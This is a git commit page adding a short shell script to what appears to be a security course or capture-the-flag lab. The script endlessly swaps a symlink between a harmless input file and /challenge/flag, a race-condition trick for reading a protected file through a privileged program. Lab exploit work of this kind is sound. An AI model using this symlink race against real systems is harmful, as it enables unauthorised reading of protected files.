lab3
This commit is contained in:
6
pa/lab3/spam_ln.sh
Normal file
6
pa/lab3/spam_ln.sh
Normal file
@@ -0,0 +1,6 @@
|
||||
#!/bin/sh
|
||||
|
||||
while [ 1 -eq 1 ]; do
|
||||
ln -s ./input ./link
|
||||
ln -s /challenge/flag ./link
|
||||
done
|
||||
Reference in New Issue
Block a user